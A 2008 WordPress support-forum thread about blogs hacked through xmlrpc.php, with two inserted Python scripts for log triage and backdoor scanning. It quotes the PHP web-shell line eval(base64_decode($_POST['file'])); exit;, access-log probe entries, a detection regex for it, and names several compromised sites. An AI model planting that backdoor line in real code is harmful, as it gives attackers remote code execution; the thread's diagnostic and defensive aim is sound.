Title: Hacking Problem
Last modified: August 19, 2016

---

# Hacking Problem

 *  [fattony69](https://wordpress.org/support/users/fattony69/)
 * (@fattony69)
 * [18 years, 3 months ago](https://wordpress.org/support/topic/hacking-problem-1/)
 * I have three blogs that I own. All of them are protected with the knowledge I
   have: .htaccess, encrypted password, etc… but I have been getting hacked lately.
   All of the sites are updated and I have checked the plugins and all are updated
   and have no problems… so what is the cause?

Viewing 15 replies - 1 through 15 (of 15 total)

 *  [vrocks](https://wordpress.org/support/users/vrocks/)
 * (@vrocks)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703504)
 * I keep getting this:
 * protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:27 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
   protected.com/logs/access.log:194.110.162.23 - - [24/Mar/2008:01:46:28 -0400] "POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1" 200 25 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
   protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.protected.com/page/3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
   protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.protected.com/page/3" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
   protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:52:18 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.protected.com/page/images/protected.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
   protected.com/logs/access.log:64.136.26.226 - - [24/Mar/2008:02:52:18 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.protected.com/page/images/protected.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)"
   protected.com/logs/access.log:78.151.173.179 - - [24/Mar/2008:05:51:43 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.protected.com/" "Dummy/1.00 (Windows NT 5.1; U; en-us)"
   protected.com/logs/access.log:78.151.173.179 - - [24/Mar/2008:05:51:46 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.protected.com/" "Dummy/1.00 (Windows NT 5.1; U; en-us)"
   protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:00:23 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
   protected.com/logs/access.log:77.91.224.14 - - [24/Mar/2008:06:03:01 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "-" "WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)"
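Added example, not part of any post in this thread: a small triage script for access-log lines shaped like the ones quoted above. It separates the `GET /xmlrpc.php` and `?rsd` discovery requests that blog clients and crawlers send from POSTs that carry a query string. The labels and the sample lines (documentation hosts and addresses) are constructed for illustration, and "review" is a heuristic, not proof of compromise.

```python
import re

# Constructed sample in the shape of the quoted lines (grep "file:" prefix plus
# Apache combined log format). Hosts and addresses are documentation values.
SAMPLE_LOG = """\
example.test/logs/access.log:192.0.2.10 - - [24/Mar/2008:01:46:27 -0400] "POST /xmlrpc.php?0123456789abcdef=fedcba9876543210 HTTP/1.1" 200 25 "-" "Mozilla/5.0"
example.test/logs/access.log:198.51.100.7 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php?rsd HTTP/1.1" 200 638 "http://www.example.test/page/3" "Mozilla/4.0"
example.test/logs/access.log:198.51.100.7 - - [24/Mar/2008:02:38:22 -0400] "GET /xmlrpc.php HTTP/1.1" 200 54 "http://www.example.test/page/3" "Mozilla/4.0"
example.test/logs/access.log:203.0.113.5 - - [24/Mar/2008:03:10:00 -0400] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "BlogClient/1.0"
this line is not an access-log entry
"""

ENTRY = re.compile(
    r'^(?:[^:\s]+:)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def classify(line):
    """Return (ip, timestamp, target, label), or None for unparseable lines."""
    m = ENTRY.match(line.strip())
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    if path != "/xmlrpc.php":
        label = "other"
    elif m["method"] == "GET" and query in ("", "rsd"):
        label = "discovery"    # RSD lookup or bare probe, as clients and crawlers send
    elif m["method"] == "POST" and not query:
        label = "xmlrpc-call"  # ordinary XML-RPC: the request lives in the POST body
    else:
        label = "review"       # e.g. a POST with a query string, which XML-RPC does not need
    return m["ip"], m["ts"], m["target"], label

def triage(text):
    """Group parsed entries by label and count non-empty lines that did not parse."""
    groups, skipped = {}, 0
    for line in text.splitlines():
        hit = classify(line)
        if hit is None:
            skipped += bool(line.strip())
            continue
        groups.setdefault(hit[3], []).append(hit[:3])
    return groups, skipped

if __name__ == "__main__":
    groups, skipped = triage(SAMPLE_LOG)
    for ip, ts, target in groups.get("review", []):
        print(f"REVIEW {ip} [{ts}] {target}")
    print({k: len(v) for k, v in groups.items()}, "unparsed:", skipped)
```
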
 *  [vrocks](https://wordpress.org/support/users/vrocks/)
 * (@vrocks)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703505)
 * Once that appears in my logs I have several files with code injected and all 
   of my files are touched to the same date.
 * [http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/](http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/)
 * Good explanation…
 * Google for:
 * eval(base64_decode($_POST['file'])); exit;
 * Apparently XMLRPC is hackable!
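Added example, not part of any post in this thread: a scanner for the two symptoms described above, PHP files containing the quoted `eval(base64_decode($_POST[...` string and many files sharing one modification time. The file names, the timestamp and the `min_shared` threshold are constructed assumptions; `demo()` builds a throwaway tree so the script runs offline.

```python
import os
import re
import tempfile
from collections import Counter

# The string quoted in the post, loosened for whitespace and for other superglobals.
BACKDOOR = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[")

def scan(root, min_shared=3):
    """Return (PHP files matching BACKDOOR, {mtime: count} for mtimes shared by
    at least min_shared PHP files)."""
    hits, mtimes = [], Counter()
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            mtimes[int(os.stat(path).st_mtime)] += 1
            with open(path, "rb") as fh:
                if BACKDOOR.search(fh.read()):
                    hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    shared = {t: n for t, n in mtimes.items() if n >= min_shared}
    return sorted(hits), shared

def demo():
    """Build a constructed tree (hypothetical file names), then scan it."""
    files = {
        "index.php": b"<?php echo 'home'; ?>",
        "includes/a.php": b"<?php function a() {} ?>",
        "includes/b.php": b"<?php function b() {} ?>",
        "theme/footer.php": b"<?php eval(base64_decode($_POST['file'])); exit; ?>",
        "readme.txt": b"not php, ignored",
    }
    stamp = 1206337587  # constructed: every file re-touched to one moment
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(body)
            os.utime(path, (stamp, stamp))
        return scan(root)

if __name__ == "__main__":
    hits, shared = demo()
    print("pattern found in:", hits)
    print("mtimes shared by several PHP files:", shared)
```

A shared modification time is only a hint, since legitimate bulk operations can also stamp many files alike; comparing the tree against a known-good copy of the same release is the stronger check.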
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703506)
 * VRocKs: There are no known exploits for WordPress 2.3.3. Are you running the 
   latest version? Are you *SURE*?
 * Furthermore, the log you posted is showing somebody running an exploit, not somebody
   installing one. That exploit could have been added to your site through any of
   half a dozen other ways.
 * We need more information to confirm that this is a WordPress issue. Nothing you
   have given us confirms that or shows any sort of a clue on how you were hacked.
 * In other words, telling us WordPress has a problem is useless to us unless you
   can also tell us where the problem is.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703507)
 * there is also no indication this is primarily a WP problem, and not something
   underlying.
 * [http://www.kidscoop.org/](http://www.kidscoop.org/) is exploited and it’s inside
   their gallery installation.
 * [http://www.larmac.com.au/](http://www.larmac.com.au/) also popped up.
 * [http://www.lentini.co.uk](http://www.lentini.co.uk) is hacked. I’ve emailed him;
   notice the old version?
 * [http://www.jtechnica.com](http://www.jtechnica.com) is hacked, with the hqc.php
   bits, even. And it’s not a wordpress install.
 * [http://www.uneditedspirituality.ca/](http://www.uneditedspirituality.ca/) is
   hacked with the hcq.php, and that’s Joomla.
 * [http://www.spinlabs.ca/](http://www.spinlabs.ca/) is hacked and it’s an older
   version. Not real old, but still. And somehow, in a case of “hahah, you reap 
   what you sow”, this person has *apparently* actively disabled the upgrade notices:
 * [http://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/](http://www.spinlabs.ca/wp-content/plugins/disable-wordpress-core-update/)
 * [http://jeremyduncan.ca/](http://jeremyduncan.ca/) is hacked, and the redirect
   to the spam content is able to be called right off his index.php page.
 * [http://www.hansdreesen.com/](http://www.hansdreesen.com/) = hacked.
 * [http://www.thinkerlabs.ca/jonmanafo](http://www.thinkerlabs.ca/jonmanafo) is
   hacked. another old version; i emailed him.. no reply.
 * Those are just a few of the sites that popped up in the $_POST logging i have
   set up on one site that I am watching. Oddly enough, even over the course of 
   a few days, the IP never changed: 216.246.56.146
 *  [vrocks](https://wordpress.org/support/users/vrocks/)
 * (@vrocks)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703508)
 * I setup a honeypot for them…
 * I also put on an aluminum foil hat…
 * I will let you know…
 *  [w00t](https://wordpress.org/support/users/w00t/)
 * (@w00t)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703509)
 * it does appear like a wordpress problem. I have been having this lately–for the
   past few weeks. Look here:
 * [http://mraziz.com/personal/2008/03/16/post-spam/](http://mraziz.com/personal/2008/03/16/post-spam/)
 * this same post mentioned above is injected with spam, no matter how many times
   I edit the post and remove it it gets back, and comments are turned off too. 
   I thought it was a problem with my host and I was hacked so I changed my host
   to a new one, same problem is happening. I’m using 2.3.3 and I’m sure about it.
 *  [Jeremy Clark](https://wordpress.org/support/users/jeremyclark13/)
 * (@jeremyclark13)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703510)
 * Do you have any logs of how they’re doing it?
 *  [w00t](https://wordpress.org/support/users/w00t/)
 * (@w00t)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703511)
 * which logs do you need? or which file?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703512)
 * I can tell you how they’re doing it. We saw it in the $_POST logging. Donncha 
   was made aware of it as well.
 * They’re calling a file behind wp-admin/. It cannot be replicated unless you are
   logged in as an admin. Not logged in, then you are properly redirected to login.
   And a simple subscriber acct, if you are logged in as such, is told they don’t
   have the necessary permissions.
 * The consensus was either it was a cookie or a password thing.
 * I am NOT sharing the file name, it serves no purpose for me to do so.
 *  Moderator [Samuel Wood (Otto)](https://wordpress.org/support/users/otto42/)
 * (@otto42)
 * WordPress.org Admin
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703513)
 * Well, how are they logging in then? I mean, I could login to your blog as you
   if I could get ahold of your cookies, but I don’t quite see how they’re getting
   those.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703514)
 * that was Donncha’s reaction, exactly, otto. I’ve seen an attempted sql exploit
   that attempts to get the admin password but it fails on a wordpress 2.3.3 install,
   and as far as I could see, it’s old.
 * There are 2 things going on.
 * 1. the wp-content/1 thing .. that attack is actually visible in your Apache logs.
   They use a core file behind wp-admin/ to create a rootshell on a file that already
   exists (that ought to give it away for you, otto)
 * 2. The insertions into actual posts. Thats yet another file behind wp-admin/
 * Both of these require you to be logged in, the _noonce fails without a valid 
   admin login.
 * I have examples of both of those, if youre interested Otto. Just drop me an email.
 *  [w00t](https://wordpress.org/support/users/w00t/)
 * (@w00t)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703515)
 * So what shall I do to resolve this?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703516)
 * start by changing your admin password. If you changed it once, change it again.
   And I don’t care what anyone says to the contrary, I would change the names of
   your cookies. Someone I helped mentioned seeing session variables inside one of
   their wordpress tables, I haven’t seen that anywhere though. If you see any, I
   would clear em.
 * If you want to be a guinea pig and try to help figuring out the problem, send
   me an email and we can set up some logging. It takes 2 minutes.
 *  [w00t](https://wordpress.org/support/users/w00t/)
 * (@w00t)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703517)
 * Anyway, if, as you say, they are logging in as admin, why is it only happening
   to the most recent post only? If I were a spammer and I obtained admin access
   I would spam/alter all the posts and even mass post spam everywhere.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703518)
 * _Anyway, if, as you say, they are logging …_
 * anyway?
 * I could answer your question by showing you the $_POST variables, I’m not going
   to.
 * I’ll assume by your lack of reply to my offer that you aren’t interested in actually
   seeing all of this for yourself, which btw, would have negated the necessity 
   for such a question. Therefore, I wish you the best, and you may consider my 
   offer rescinded.


The topic ‘Hacking Problem’ is closed to new replies.

## Tags

 * [hacking](https://wordpress.org/support/topic-tag/hacking/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 15 replies
 * 6 participants
 * Last reply from: [whooami](https://wordpress.org/support/users/whooami/)
 * Last activity: [18 years, 2 months ago](https://wordpress.org/support/topic/hacking-problem-1/#post-703518)
 * Status: not resolved

